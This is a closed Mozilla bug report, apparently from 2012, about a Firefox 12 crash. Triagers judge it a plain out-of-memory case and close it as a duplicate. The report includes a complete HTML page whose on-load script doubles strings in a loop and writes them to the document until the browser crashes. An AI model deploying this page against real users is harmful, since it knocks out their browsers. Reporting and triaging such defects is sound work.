Closed Bug 752227 Opened 13 years ago Closed 13 years ago

Mozilla Firefox <=12.0 Denial Of Service Exploit

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Platform:
x86_64
Windows 7
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 736868

People

(Reporter: ni-_-_-_-_maarek, Unassigned)

Details

Attachments

(1 file)

Mozilla Firefox Denial Of Service Exploit.txt
929 bytes, text/plain
Details
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19 Steps to reproduce: save this file to html and run with ff <html> <title>FF go away :)</title> <head> <script> function FTB() { var A1 = unescape("%u4141%u4141"); var A2 = unescape("%u4242%u4242"); var A3 = unescape("%u4343%u4343"); var A4 = unescape("%u4444%u4444"); for(i=0; i <= 1000 ; ++i) { A1+=A1; A2+=A2; A3+=A3; A4+=A4; document.write(A1); document.write(A2); document.write(A3); document.write(A4); } document.write(A1); document.write(A2); document.write(A3); document.write(A4); } </script> </head> <body onLoad="FTB()"> </body> </html> Actual results: crash ff
This looks like a typical memory-exhaustion script. Create a string; then double its length, add it to the document, and repeat.... sure, you'll exhaust available memory before long. Is there any reason to suspect there's something other than a simple out-of-memory crash here?
it's not even original - see bug 736868
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: